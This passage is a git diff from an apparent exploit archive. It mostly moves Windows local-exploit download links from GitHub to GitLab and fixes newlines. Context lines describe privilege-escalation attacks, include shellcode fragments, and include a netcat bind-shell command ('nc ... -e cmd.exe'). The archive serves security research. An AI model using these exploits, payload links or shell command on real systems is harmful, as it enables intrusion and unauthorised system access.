https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14744.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14744.zip \ No newline at end of file diff --git a/exploits/windows/local/14745.c b/exploits/windows/local/14745.c index 3668a2122..1f5920500 100644 --- a/exploits/windows/local/14745.c +++ b/exploits/windows/local/14745.c @@ -25,4 +25,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14745.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip \ No newline at end of file diff --git a/exploits/windows/local/14746.c b/exploits/windows/local/14746.c index 9661c19e3..7fde79246 100644 --- a/exploits/windows/local/14746.c +++ b/exploits/windows/local/14746.c @@ -24,4 +24,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14746.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14746.zip \ No newline at end of file diff --git a/exploits/windows/local/14747.c b/exploits/windows/local/14747.c index 263ab43fe..7c113b45e 100644 --- a/exploits/windows/local/14747.c +++ b/exploits/windows/local/14747.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14747.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14747.zip \ No newline at end of file diff --git a/exploits/windows/local/14748.txt b/exploits/windows/local/14748.txt index 412d8da86..14cab9013 100644 --- a/exploits/windows/local/14748.txt +++ b/exploits/windows/local/14748.txt @@ -27,6 +27,6 @@ utorrent.exe directory, the payload will be executed with users' credentials. -rpcrtremote.dll -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz) #[pocoftheday.blogspot.com] \ No newline at end of file diff --git a/exploits/windows/local/14758.c b/exploits/windows/local/14758.c index ebb9251aa..c2bc1d7c3 100644 --- a/exploits/windows/local/14758.c +++ b/exploits/windows/local/14758.c @@ -24,4 +24,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14758.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14758.zip \ No newline at end of file diff --git a/exploits/windows/local/14764.c b/exploits/windows/local/14764.c index 90b7cb358..0bce51bf4 100644 --- a/exploits/windows/local/14764.c +++ b/exploits/windows/local/14764.c @@ -25,4 +25,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14764.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14764.zip \ No newline at end of file diff --git a/exploits/windows/local/14765.c b/exploits/windows/local/14765.c index d17993971..ab4d288a5 100644 --- a/exploits/windows/local/14765.c +++ b/exploits/windows/local/14765.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14765.zip (mpc-poc.zip) \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14765.zip (mpc-poc.zip) \ No newline at end of file diff --git a/exploits/windows/local/14769.c b/exploits/windows/local/14769.c index ae95e3938..5adb1e781 100644 --- a/exploits/windows/local/14769.c +++ b/exploits/windows/local/14769.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14769.rar (nvidia-poc.rar) \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14769.rar (nvidia-poc.rar) \ No newline at end of file diff --git a/exploits/windows/local/14780.c b/exploits/windows/local/14780.c index cbc7271b5..5ba46ff31 100644 --- a/exploits/windows/local/14780.c +++ b/exploits/windows/local/14780.c @@ -21,6 +21,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { alpdaemon(); return 0; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/14944.py b/exploits/windows/local/14944.py index c0e732ddd..be98f2930 100755 --- a/exploits/windows/local/14944.py +++ b/exploits/windows/local/14944.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14944.zip (moaub-8-exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14944.zip (moaub-8-exploit.zip) ''' ''' diff --git a/exploits/windows/local/14966.py b/exploits/windows/local/14966.py index 1395e7040..470a2f7ab 100755 --- a/exploits/windows/local/14966.py +++ b/exploits/windows/local/14966.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14966.zip (moaub-10-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14966.zip (moaub-10-exploit.zip) ''' ''' diff --git a/exploits/windows/local/14982.py b/exploits/windows/local/14982.py index c05785449..1ca196170 100755 --- a/exploits/windows/local/14982.py +++ b/exploits/windows/local/14982.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub12-adobe-acrobat-and-reader-pushstring-memory-corruption/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14982.zip (moaub-12-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14982.zip (moaub-12-exploit.zip) ''' ''' diff --git a/exploits/windows/local/15022.py b/exploits/windows/local/15022.py index 58558be9f..56725a857 100755 --- a/exploits/windows/local/15022.py +++ b/exploits/windows/local/15022.py @@ -74,4 +74,4 @@ buf += ",0,7462,885953024,4,1,640,480\r\n" #Required file text f = open("sploit.ilj", "w") f.write(buf) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/local/15094.py b/exploits/windows/local/15094.py index 82148b70e..cb32d83da 100755 --- a/exploits/windows/local/15094.py +++ b/exploits/windows/local/15094.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15094.zip (moaub-24-excel-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15094.zip (moaub-24-excel-exploit.zip) ''' ''' diff --git a/exploits/windows/local/15609.txt b/exploits/windows/local/15609.txt index 262d690ad..34f9a98b2 100644 --- a/exploits/windows/local/15609.txt +++ b/exploits/windows/local/15609.txt @@ -3,7 +3,7 @@ A Design Flaw in Windows Kernel API can Lead to privilege escalation. Mirror of Original Post: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/ PoC: http://www.codeproject.com/KB/vista-security/uac.aspx (not available) -mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15609.zip (uacpoc.zip) +mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15609.zip (uacpoc.zip) After running this PoC, just type “whoami” in command prompt to see the escalated user credentials. Points of Interest diff --git a/exploits/windows/local/15624.txt b/exploits/windows/local/15624.txt index 79bd4e66b..5f8df34eb 100644 --- a/exploits/windows/local/15624.txt +++ b/exploits/windows/local/15624.txt @@ -79,4 +79,4 @@ and force execution with kernel priviligies(cpl==0). Exploit code is in CAInternetSecuritySuite2010.zip file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15624.zip (CAInternetSecuritySuite2010.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15624.zip (CAInternetSecuritySuite2010.zip) \ No newline at end of file diff --git a/exploits/windows/local/15696.txt b/exploits/windows/local/15696.txt index 2bc677a20..845c00c41 100644 --- a/exploits/windows/local/15696.txt +++ b/exploits/windows/local/15696.txt @@ -58,4 +58,4 @@ FhUAn0y6pBrAJXLcLiEfINR5hT4MfL52 =zMAG -----END PGP SIGNATURE----- -Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15696.a2w (Off_with_her_head.a2w) \ No newline at end of file +Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15696.a2w (Off_with_her_head.a2w) \ No newline at end of file diff --git a/exploits/windows/local/15706.txt b/exploits/windows/local/15706.txt index 2223b0438..a9f0dd5c5 100644 --- a/exploits/windows/local/15706.txt +++ b/exploits/windows/local/15706.txt @@ -1,6 +1,6 @@ http://www.kryptoslogic.com/advisories/2010/kryptoslogic-winamp-midi.txt -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15706.c +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15706.c ==-===-=====-=======-===========-=============-================= diff --git a/exploits/windows/local/15761.txt b/exploits/windows/local/15761.txt index c8b5880ea..4e63d03b8 100644 --- a/exploits/windows/local/15761.txt +++ b/exploits/windows/local/15761.txt @@ -473,7 +473,4 @@ printf("cannot dev ctl %u\n",GetLastError()); return 0 ; } return 0; -} - - - +} \ No newline at end of file diff --git a/exploits/windows/local/15762.txt b/exploits/windows/local/15762.txt index 63564686b..ee97d1432 100644 --- a/exploits/windows/local/15762.txt +++ b/exploits/windows/local/15762.txt @@ -616,6 +616,4 @@ push 2 call pqi } return 0; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/15763.txt b/exploits/windows/local/15763.txt index 740090672..e58e0cb6f 100644 --- a/exploits/windows/local/15763.txt +++ b/exploits/windows/local/15763.txt @@ -301,6 +301,4 @@ push 0 call p } return 0; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/15764.txt b/exploits/windows/local/15764.txt index 57c349db4..286dcaabf 100644 --- a/exploits/windows/local/15764.txt +++ b/exploits/windows/local/15764.txt @@ -397,6 +397,4 @@ printf("dev ctrl 2 failed %u\n", GetLastError()); return 0 ; } return 0 ; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/15994.rb b/exploits/windows/local/15994.rb index d4e0ed32e..7a6e7823d 100755 --- a/exploits/windows/local/15994.rb +++ b/exploits/windows/local/15994.rb @@ -88,4 +88,4 @@ begin sleep(1) rescue puts "ERROR TO CREATE THE FILE"+file -end +end \ No newline at end of file diff --git a/exploits/windows/local/16024.txt b/exploits/windows/local/16024.txt index c0e4d01a2..ae93bb706 100644 --- a/exploits/windows/local/16024.txt +++ b/exploits/windows/local/16024.txt @@ -76,10 +76,10 @@ considered valid. DoS: http://aluigi.org/poc/fxscover_1.cov -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/16024-fxscover_1.cov +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/16024-fxscover_1.cov Bind Shell: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/fxscover_1_bind28876.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/fxscover_1_bind28876.zip ####################################################################### diff --git a/exploits/windows/local/17158.txt b/exploits/windows/local/17158.txt index 674f8b65b..4cd81b03f 100644 --- a/exploits/windows/local/17158.txt +++ b/exploits/windows/local/17158.txt @@ -109,7 +109,7 @@ has been created chm_1.chm using the steps listed above. http://aluigi.org/poc/chm_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17158.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17158.zip ####################################################################### diff --git a/exploits/windows/local/17473.txt b/exploits/windows/local/17473.txt index ea5894905..20fbd9511 100644 --- a/exploits/windows/local/17473.txt +++ b/exploits/windows/local/17473.txt @@ -16,4 +16,4 @@ # also check here for The Persian docs of this methods and more : http://www.0days.ir/article/ -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17473.pdf (cve-2011-0611_exploit.pdf) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17473.pdf (cve-2011-0611_exploit.pdf) \ No newline at end of file diff --git a/exploits/windows/local/17474.txt b/exploits/windows/local/17474.txt index 0d2d8231f..eef540be4 100644 --- a/exploits/windows/local/17474.txt +++ b/exploits/windows/local/17474.txt @@ -149,4 +149,4 @@ stores in stack :D -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17474.doc (cve-2011-3333_exploit.doc) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17474.doc (cve-2011-3333_exploit.doc) \ No newline at end of file diff --git a/exploits/windows/local/17488.txt b/exploits/windows/local/17488.txt index 9f27ad347..95782d4b3 100644 --- a/exploits/windows/local/17488.txt +++ b/exploits/windows/local/17488.txt @@ -17,4 +17,4 @@ <ids original="FEBDB19E0CD32274C16CE13DCF244AD2" modified="5BE74DD4F607B7409DC03D600E466E12"/> </xfdf> -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf) \ No newline at end of file +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf) \ No newline at end of file diff --git a/exploits/windows/local/17820.c b/exploits/windows/local/17820.c index cb7d6763e..1d01b7c8a 100644 --- a/exploits/windows/local/17820.c +++ b/exploits/windows/local/17820.c @@ -239,5 +239,4 @@ int main(int argc, char **argv) } printf("done"); -} - +} \ No newline at end of file diff --git a/exploits/windows/local/18067.txt b/exploits/windows/local/18067.txt index 9e9d6b625..c0c4ab701 100644 --- a/exploits/windows/local/18067.txt +++ b/exploits/windows/local/18067.txt @@ -152,4 +152,4 @@ http://www.abysssec.com/blog/wp-content/uploads/2011/11/MS11-021.zip EDB mirror : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18067.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18067.zip \ No newline at end of file diff --git a/exploits/windows/local/18372.txt b/exploits/windows/local/18372.txt index f9fab62ce..b6058651e 100644 --- a/exploits/windows/local/18372.txt +++ b/exploits/windows/local/18372.txt @@ -5,7 +5,7 @@ # Tested on: Windows 7 32bit # CVE : CVE-2012-0013 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18372.docm +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18372.docm Open the document file, then allow the macro execution. This will execute python script (python interpreters are required). diff --git a/exploits/windows/local/19198.txt b/exploits/windows/local/19198.txt index 937bf6b62..0f80e7c2d 100644 --- a/exploits/windows/local/19198.txt +++ b/exploits/windows/local/19198.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/234/info The names and mappings of kernel objects in NT are cached in the "object namespace". In this area, DLL mappings are kept in a section called KnownDlls. By manipulating the namespace, it is possible to redirect calls to arbitrary dlls. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19198.zip \ No newline at end of file diff --git a/exploits/windows/local/19209.c b/exploits/windows/local/19209.c index 7b8e96c4e..47afb7c1d 100644 --- a/exploits/windows/local/19209.c +++ b/exploits/windows/local/19209.c @@ -75,4 +75,4 @@ ExploitCode[200]=""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19209.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19209.tar.gz \ No newline at end of file diff --git a/exploits/windows/local/19359.txt b/exploits/windows/local/19359.txt index 444d250f0..0578f3cd8 100644 --- a/exploits/windows/local/19359.txt +++ b/exploits/windows/local/19359.txt @@ -6,4 +6,4 @@ This exploit and description provided by Cybermedia Software Private Limited. The simulation consists of one 32-bit application say BEADMIN.EXE and one MS-DOS based application, say SCRNSAVE.EXE. The BEADMIN.EXE when started does the following Creates one event in â??not-signalâ??ed state Sets up the screen saver. The screen saver executable is specified as SCRNSAVE.EXE and the timeout is set to minimum. . BEADMIN.EXE now waits on the event. After some time, the screen saver is triggered. This results in Winlogon.Exe spawning SCRNSAVE.EXE. Since the CreateProcess call returns junk handle to Winlogon.Exe, the setting of primary token fails. Hence the SCRNSAVE.EXE application (NTVDM.EXE) runs in System Context. This SCRNSAVE.EXE again spawns BEADMIN.EXE application. Now this second copy of BEADMIN.EXE inherits the security context of NTVDM which is System Context. This application adds the logged in user to admin group and signals the event on which first instance of BEADMIN.EXE is waiting. In response to this the first copy of BEADMIN.EXE resets back the Screen Saver settings and quits. The logged in user name is passed between the first and second copy of BEADMIN.EXE using shared section. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19359.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19359.zip \ No newline at end of file diff --git a/exploits/windows/local/19401.txt b/exploits/windows/local/19401.txt index 821c4ae45..6f27d0eb7 100644 --- a/exploits/windows/local/19401.txt +++ b/exploits/windows/local/19401.txt @@ -58,10 +58,10 @@ Security manager = null PoC === -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19401.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19401.zip ======== Advisory ======== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19401.pdf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19401.pdf \ No newline at end of file diff --git a/exploits/windows/local/19425.txt b/exploits/windows/local/19425.txt index 558e28a9c..9fe717843 100644 --- a/exploits/windows/local/19425.txt +++ b/exploits/windows/local/19425.txt @@ -40,4 +40,4 @@ After all done, just click in the button "Retrieve Data" and see what happens =)  -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19425.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19425.zip \ No newline at end of file diff --git a/exploits/windows/local/19502.txt b/exploits/windows/local/19502.txt index ddbc37383..1f4808bd5 100644 --- a/exploits/windows/local/19502.txt +++ b/exploits/windows/local/19502.txt @@ -4,6 +4,6 @@ Any authenticated NT user (ie domain user) can modify the pathname for the RASMA 19502-1.exe <binary pathname> will modify the RASMAN/ImagePath key in the Registry with the service executable to be run in its place. 19502-2.exe (author supplied) is a sample trojan service that may be run. This executable runs a service which launches a netcat listener on tcp port 123. (nc -d -L -p 123 -e cmd.exe). (This service may or may not run with errors.) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19502-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19502-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19502-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19502-2.exe \ No newline at end of file diff --git a/exploits/windows/local/19594.txt b/exploits/windows/local/19594.txt index 739c8e8af..73ce2b459 100644 --- a/exploits/windows/local/19594.txt +++ b/exploits/windows/local/19594.txt @@ -4,4 +4,4 @@ The spooler service (spoolss.exe) allows local users to add their own dll files This exploit will crash the spooler service and copy a custom dll into c:\winnt\system32. When the spooler service is restarted, the custom dll is loaded and run at SYTEM level. The 'whoami' binary is run and the results logged in a text file for verification. If the target machine's NT directory is not the default c:\winnt, the program will have to be modified. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19594.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19594.zip \ No newline at end of file diff --git a/exploits/windows/local/19633.txt b/exploits/windows/local/19633.txt index 0571fbee7..b396a8a04 100644 --- a/exploits/windows/local/19633.txt +++ b/exploits/windows/local/19633.txt @@ -13,4 +13,4 @@ Now insert 32 characters after the .rtf identifier: {\rtf1\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAansi\deff0\deftab720{\fonttbl...etc...etc When this file is opened in Wordpad, the program will crash. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19633.wri \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19633.wri \ No newline at end of file diff --git a/exploits/windows/local/19733.txt b/exploits/windows/local/19733.txt index 4f77a7e20..6e2fce8d2 100644 --- a/exploits/windows/local/19733.txt +++ b/exploits/windows/local/19733.txt @@ -12,4 +12,4 @@ This exploit will install a 'decoy' executable to the desktop, and install a fil The zip file contains the executable exploit, and source for the installer and the decoy. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19733.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19733.zip \ No newline at end of file diff --git a/exploits/windows/local/19739.txt b/exploits/windows/local/19739.txt index a52cdf877..de9b21dc8 100644 --- a/exploits/windows/local/19739.txt +++ b/exploits/windows/local/19739.txt @@ -12,4 +12,4 @@ This exploit will create a range of folders in th e\Recyycler folder of the sele Usage: RecyclerSnooper #_of_folders driveletter Example: RecyclerSnooper 200 C -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19739.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19739.exe \ No newline at end of file diff --git a/exploits/windows/local/19789.txt b/exploits/windows/local/19789.txt index d6f825d12..d40058282 100644 --- a/exploits/windows/local/19789.txt +++ b/exploits/windows/local/19789.txt @@ -4,4 +4,4 @@ A vulnerability exists within the Microsoft Clip Art Gallery, where a remote use Clip art can be downloaded from any website and incorporated into the local gallery. A particular file format called .CIL is used in order to transport new clip art files to the users. The vulnerability is that a user may open a malformed .CIL file containing a long embedded field downloaded from a malicious third-party website or in the form of an email attachment regardless of it's origin. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19789.bad \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19789.bad \ No newline at end of file diff --git a/exploits/windows/local/19839.txt b/exploits/windows/local/19839.txt index 13f6c2d19..73c5a1dea 100644 --- a/exploits/windows/local/19839.txt +++ b/exploits/windows/local/19839.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1097/info CRYPTOCard CRYPTOAdmin is a network authentication application for use with the Palm OS platform. CRYPTOAdmin generates a .pdb file which contains the username, PIN number, serial number, and key in encrypted or plaintext format. The PIN number can be retrieved due to the software's usage of a fixed 4-byte value in key generation. With access to the .pdb file and PIN number, a user is capable of duplicating the token onto another Palm device effectively gaining access to the network as the compromised user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19839.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19839.zip \ No newline at end of file diff --git a/exploits/windows/local/19855.txt b/exploits/windows/local/19855.txt index 9d6184c46..00b3ed4f4 100644 --- a/exploits/windows/local/19855.txt +++ b/exploits/windows/local/19855.txt @@ -6,4 +6,4 @@ One of the restrictive policies possible is to disable registry editing. However In addition, users can uninstall Panda Security through the Add/Remove Programs applet in the Control Panel. An error message will appear when the user attempts to uninstall Panda Security. However upon reboot, the application will have been successfully uninstalled. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19855.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19855.zip \ No newline at end of file diff --git a/exploits/windows/local/19894.txt b/exploits/windows/local/19894.txt index be6d76c6a..1fb1ed9d5 100644 --- a/exploits/windows/local/19894.txt +++ b/exploits/windows/local/19894.txt @@ -4,4 +4,4 @@ Alladin Knowledge Systems eToken is a USB smartcard-like device used for authent The PIN number can be reset to the default value with the use of standard device programmers. This can be done by physically opening the eToken device (which can be done without leaving any trace or evidence of tampering) and copying the default PIN value to the location used to store either the user PIN or administrator PIN in the serial EEPROM. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19894.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19894.zip \ No newline at end of file diff --git a/exploits/windows/local/20012.txt b/exploits/windows/local/20012.txt index d271640d9..802b4ee6a 100644 --- a/exploits/windows/local/20012.txt +++ b/exploits/windows/local/20012.txt @@ -12,6 +12,6 @@ The first byte will be the length of the key (n), the next (n) bytes are the key 20012-1.exe - Administrator password decryptor for Win 9x/NT. 20012-2.zip - Source code (use TASM). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20012-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20012-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20012-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20012-2.zip \ No newline at end of file diff --git a/exploits/windows/local/20022.txt b/exploits/windows/local/20022.txt index 5b5a0a8c7..7734a1303 100644 --- a/exploits/windows/local/20022.txt +++ b/exploits/windows/local/20022.txt @@ -11,4 +11,4 @@ Other security flaws present in S to Infinity: - File and directory attributes can be modified using the DOS attrib command. StoI file-level protection does not rely on DOS file attributes, so this will not affect StoI settings. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20022.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20022.exe \ No newline at end of file diff --git a/exploits/windows/local/20257.txt b/exploits/windows/local/20257.txt index 8e2539a44..343802b06 100644 --- a/exploits/windows/local/20257.txt +++ b/exploits/windows/local/20257.txt @@ -63,4 +63,4 @@ porttool -c \BaseNamedObjects\Foo3 (in window for porttool -s5b) Enter PID, TID, MID, CID from porttool -s -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20257.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20257.zip \ No newline at end of file diff --git a/exploits/windows/local/20265.txt b/exploits/windows/local/20265.txt index 0586d687f..22699b896 100644 --- a/exploits/windows/local/20265.txt +++ b/exploits/windows/local/20265.txt @@ -13,4 +13,4 @@ start porttool -c \BaseNamedObjects\Foo porttool -s3 \BaseNamedObjects\Foo2 (enter PID, TID, MID from porttool -s ...) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20265.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20265.zip \ No newline at end of file diff --git a/exploits/windows/local/20383.txt b/exploits/windows/local/20383.txt index c6fb99182..fea7ced56 100644 --- a/exploits/windows/local/20383.txt +++ b/exploits/windows/local/20383.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1911/info The ASP ISAPI file parser does not properly execute certain malformed ASP files that contain scripts with the LANGUAGE parameter containing a buffer of over 2200 characters and have the RUNAT value set as 'server'. Depending on the data entered into the buffer, a denial of service attack could be launched or arbitrary code could be executed under the SYSTEM privilege level in the event that a malicious ASP file were locally executed on IIS. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20383.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20383.zip \ No newline at end of file diff --git a/exploits/windows/local/2094.c b/exploits/windows/local/2094.c index 7e5e1dbd6..0f3a26355 100644 --- a/exploits/windows/local/2094.c +++ b/exploits/windows/local/2094.c @@ -271,4 +271,4 @@ void std_err(void) { exit(1); } -// milw0rm.com [2006-07-31] +// milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/exploits/windows/local/21072.txt b/exploits/windows/local/21072.txt index 42a4028bc..0a568450c 100644 --- a/exploits/windows/local/21072.txt +++ b/exploits/windows/local/21072.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/3193/info A vulnerability exists in Microsoft's Internet Information Services 5.0 which could allow a user with write permission to run any code with System privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21072.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21072.zip \ No newline at end of file diff --git a/exploits/windows/local/21096.txt b/exploits/windows/local/21096.txt index dcdc4d2a2..2feeca44a 100644 --- a/exploits/windows/local/21096.txt +++ b/exploits/windows/local/21096.txt @@ -6,4 +6,4 @@ A vulnerability exists which allows a file embedded within an HTML frame in an e If 